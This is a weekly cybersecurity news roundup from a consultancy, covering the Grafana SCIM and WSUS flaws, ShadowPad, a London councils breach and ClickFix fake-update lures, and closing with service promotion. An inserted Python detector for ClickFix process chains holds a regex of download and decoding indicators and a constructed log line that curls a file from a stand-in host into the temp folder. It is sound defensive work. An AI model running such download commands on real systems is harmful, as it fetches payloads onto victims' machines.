
This Week in Cybersecurity: Looking Back at Week 48

November 28, 2025 Reading Time: 6 minutes

This week’s intelligence confirms a surge in identity-based exploitation and systemic operational risk.

We track a maximum severity flaw in Grafana SCIM (CVSS 10.0) and the deployment of ShadowPad malware via unpatched update servers, underscoring the danger of flawed privileged access.

Furthermore, the ClickFix social engineering attack, which leverages a realistic, full-screen Windows Update animation to trick users into running malware, and a major breach of London councils reinforce that operational resilience and vendor security are paramount.

1. Maximum Severity Vulnerability & Exploitation

Maximum Severity Flaw in Grafana SCIM Component Patched

Grafana has released urgent security updates to address a maximum severity security flaw, tracked as CVE-2025-41115, which carries a CVSS score of 10.0.

The vulnerability resides in the System for Cross-domain Identity Management (SCIM) component. This flaw allows a malicious client to override internal user IDs, potentially leading to user impersonation or privilege escalation (e.g., impersonating an Admin user).


Our Take: Identity Flaws are the New RCE.

A CVSS 10.0 flaw in an identity management component requires immediate action. This vulnerability highlights the extreme danger of flawed identity workflows. Our Penetration Testing and Vulnerability Assessments can help organisations verify the integrity of their SCIM and SSO implementations immediately.


ShadowPad Malware Actively Exploits WSUS Vulnerability for Full System Access

A recently patched security flaw in Microsoft Windows Server Update Services (WSUS) has been exploited by threat actors to distribute sophisticated malware known as ShadowPad. The attackers exploited a critical deserialisation flaw (CVE-2025-59287) to achieve remote code execution with system privileges.

ShadowPad, a modular backdoor often associated with Chinese state-sponsored hacking groups, is launched using DLL side-loading to achieve memory-resident execution that evades detection.


Our Take: Server RCE is Being Weaponised Rapidly.

The immediate exploitation of the WSUS flaw to distribute state-sponsored malware underscores the urgency of patching update servers. Unpatched WSUS instances provide immediate, high-level access to the core network environment.


2. Resilience & Operational Crisis

Major Cyber Attack Hits Multiple London Councils

Multiple London councils, including Kensington & Chelsea and Westminster City Council, which share IT systems, were struck by a serious cyber attack.

Officials confirmed the incident has the potential to compromise residents’ sensitive data, such as social care records and housing information. The councils invoked emergency plans and shut down several systems as a precaution, disrupting critical services.


Our Take: Public Sector Vulnerability is High Risk.

Attacks on local government expose extremely sensitive data. This case demonstrates the critical risk of shared infrastructure and the need for public sector entities to conduct stringent Third Party Assurance Assessments on all common IT providers.


Slovenia’s ELES Joins ENCS to Fortify Europe’s Power Grid Resilience

Slovenia’s state electricity transmission system operator, ELES, has joined the European Network for Cyber Security (ENCS) to strengthen continental defences against surging threats to the power grid. This collaboration is a strategic move to build cyber resilience in Europe’s critical energy infrastructure.


Our Take: OT Security is a Collective Defence.

This underscores the market-wide trend of collective defence and intelligence sharing, which is crucial for managing systemic risk in critical sectors. Organisations must participate in relevant intelligence sharing networks (like ENCS) and ensure their OT security aligns with pan-European standards.


3. Identity & Social Engineering

ClickFix Attack Hides Info Stealers Inside Fake Windows Update Screens

A highly deceptive variant of the ClickFix social engineering attack is leveraging a realistic, full-screen Windows Update animation to trick users into running malware.

The attack convinces victims to press a specific key sequence, which automatically executes malicious commands in the Command Prompt. This multi-stage process uses steganography to conceal the final malware payload, the LummaC2 and Rhadamanthys information stealers, directly inside PNG images.


Our Take: Advanced Phishing Demands Advanced Training.

This level of deception requires immediate user training. Organisations must focus on monitoring for suspicious process chains and deploy Simulated Phishing Attacks that test for steganography-based evasion and native system manipulation.
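One way to monitor for the process chain this lure produces (the desktop shell spawning a command interpreter that fetches or decodes content), as an added example that is not part of the original article: the log format, field names and indicator list are assumptions, and the records are constructed.

```python
"""Heuristic detector for ClickFix-style process chains (added example,
not from the article). Scans constructed, Sysmon-style process-creation
records for the pattern the lure produces: a shell spawned from the
desktop shell (explorer.exe) whose command line fetches or decodes
content. Field names and the indicator list are assumptions."""
import re
from dataclasses import dataclass

SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "mshta.exe"}
# Indicators that a one-liner reaches out to the network or decodes hidden content.
NET_OR_DECODE = re.compile(
    r"(https?://|invoke-webrequest|\biwr\b|\bcurl\b|downloadstring|"
    r"frombase64string|\s-enc\w*\s|\.png\b)", re.IGNORECASE)

@dataclass
class ProcEvent:
    parent_image: str
    image: str
    command_line: str

def parse_record(line: str) -> ProcEvent:
    """Parse 'Key=value|Key=value' records (constructed log format)."""
    fields = dict(kv.split("=", 1) for kv in line.strip().split("|"))
    return ProcEvent(fields["ParentImage"], fields["Image"], fields["CommandLine"])

def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def is_clickfix_chain(ev: ProcEvent) -> bool:
    """explorer.exe -> shell interpreter with network/decoding indicators."""
    return (basename(ev.parent_image) == "explorer.exe"
            and basename(ev.image) in SHELLS
            and NET_OR_DECODE.search(ev.command_line) is not None)

def scan(lines) -> list:
    """Return the command lines of records matching the heuristic."""
    return [ev.command_line for ev in map(parse_record, lines) if is_clickfix_chain(ev)]

SAMPLE_LOG = [  # constructed records, not real telemetry
    r"ParentImage=C:\Windows\explorer.exe|Image=C:\Windows\System32\cmd.exe"
    r"|CommandLine=cmd /c curl http://example.invalid/update.png -o %TEMP%\update.png",
    r"ParentImage=C:\Windows\explorer.exe|Image=C:\Windows\System32\notepad.exe"
    r"|CommandLine=notepad.exe notes.txt",
    r"ParentImage=C:\Tools\Code.exe|Image=C:\Windows\System32\cmd.exe"
    r"|CommandLine=cmd /c npm test",
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print("ALERT ClickFix-style chain:", hit)
```

In production the parent/child relationship comes from the process-creation telemetry itself (Sysmon Event ID 1 or equivalent), and developer workstations will need tuning because explorer-launched shells are common there.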


Microsoft FIDO2 Security Keys May Require PIN After Windows Update

Microsoft has warned users that FIDO2 security keys may now require a PIN during the sign-in process after installing recent Windows updates. Microsoft states this is an intentional change to comply with WebAuthn specifications. Organisations and services can prevent mandatory PIN entry by configuring their WebAuthn settings to set user verification to “discouraged”.


Our Take: Identity Changes Require Planning.

While this is a compliance measure, it impacts user experience and internal help desks. Identity providers must be configured proactively, and administrators should ensure all SSO environments and FIDO2 policies are reviewed.
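The relying-party side of that setting, as an added example that is not part of the original article or Microsoft’s guidance: it builds the assertion options in which userVerification is set per role (“discouraged” removes the PIN prompt) and, more importantly, checks the UV flag in the signed authenticatorData, which is what actually enforces the policy. Role names, the policy table and the test data are assumptions.

```python
"""Relying-party (server) side of the WebAuthn user-verification setting
(added example, not from the article or Microsoft). Builds the assertion
options an RP sends to the browser, where userVerification="discouraged"
avoids the PIN prompt the article describes, and performs the check that
actually enforces the policy: the UV flag inside the signed
authenticatorData the key returns. Role names and UV_POLICY are assumptions."""
import base64
import os

# Assumed policy: privileged flows keep user verification (PIN/biometric);
# ordinary flows may treat the key as a possession-only second factor.
UV_POLICY = {"admin": "required", "user": "discouraged"}

FLAG_UP = 0x01  # user present
FLAG_UV = 0x04  # user verified

def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

def assertion_options(rp_id: str, role: str, cred_ids: list) -> dict:
    """PublicKeyCredentialRequestOptions as a JSON-ready dict."""
    return {
        "challenge": b64url(os.urandom(32)),
        "rpId": rp_id,
        "allowCredentials": [{"type": "public-key", "id": b64url(c)} for c in cred_ids],
        "userVerification": UV_POLICY[role],
        "timeout": 60000,
    }

def uv_satisfied(authenticator_data: bytes, role: str) -> bool:
    """Flags byte sits at offset 32, after the 32-byte rpIdHash."""
    if len(authenticator_data) < 37:  # rpIdHash + flags + signCount
        return False
    flags = authenticator_data[32]
    if not flags & FLAG_UP:
        return False  # user presence is always mandatory
    if UV_POLICY[role] == "required":
        return bool(flags & FLAG_UV)
    return True  # "discouraged": UV is not demanded, only possession

def fake_auth_data(flags: int) -> bytes:
    """Constructed authenticatorData for testing: rpIdHash|flags|signCount."""
    return bytes(32) + bytes([flags]) + (1).to_bytes(4, "big")

if __name__ == "__main__":
    print(assertion_options("example.invalid", "user", [b"\x01\x02"]))
    print(uv_satisfied(fake_auth_data(FLAG_UP), "admin"))            # False
    print(uv_satisfied(fake_auth_data(FLAG_UP | FLAG_UV), "admin"))  # True
```

Setting “discouraged” for everyone silences the prompt but also drops the second factor inside the key for privileged sign-ins, so the review the take above calls for should decide this per role rather than globally.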


4. Insider, Supply Chain & Governance

Data Leak Crisis: Code Formatting Tools Expose Thousands of Enterprise Secrets

New research discovered that highly sensitive credentials were leaked via popular online tools like JSONFormatter and CodeBeautify. The sites’ public features exposed over 80,000 user pastes containing thousands of secrets, including Active Directory credentials and cloud environment keys, scraped by threat actors.


Our Take: Stop External Secret Exposure.

This is a critical security awareness failure. Implement strong technical controls and Third Party Assurance Assessments to prohibit pasting sensitive organisational code and credentials into untrusted external web services.


Hardening Identity and Securing Systemic Resilience

This week’s intelligence reveals that flawed identity controls (Grafana SCIM, FIDO2) and systemic vendor failure (London Councils breach) are the primary sources of critical operational risk. The consequence of these failures is direct and catastrophic, threatening public safety and resident data.

Secora Consulting’s specialised service pillars are explicitly designed to counter the advanced threats highlighted this week:

  • Proactive Technical Validation: To ensure exploitation paths via identity and server flaws are eliminated, our Adversary Simulation Testing and Penetration Testing services stress-test your live environment, targeting privileged access and zero-day attack vectors like WSUS.

  • Risk & Vulnerability Management: Our Vulnerability Assessments provide the technical clarity needed for effective remediation prioritisation (e.g., CVSS 10.0 flaws), while Cybersecurity Maturity Assessments establish a strategic roadmap for holistic defence.

  • Compliance & Supply Chain Resilience: The London Councils breach underscores the need for assured processes. Our Third Party Assurance Assessments, combined with NIS2 Directive Consultancy, ISO 27001 Consultancy and PCI DSS Consultancy, ensure vendor and regulatory resilience.

  • People & Process Resilience: The sophisticated ClickFix and BitB phishing techniques, along with insider threat risks, prove human error remains the primary attack vector. Our Simulated Phishing Attacks and Crisis Management Exercises transform your staff into an effective human firewall and ensure your executive team is prepared to respond legally and operationally during a major breach.

Security must be a layered, strategic function. Contact us today to strengthen your security architecture and turn these threats into actionable defence strategy.
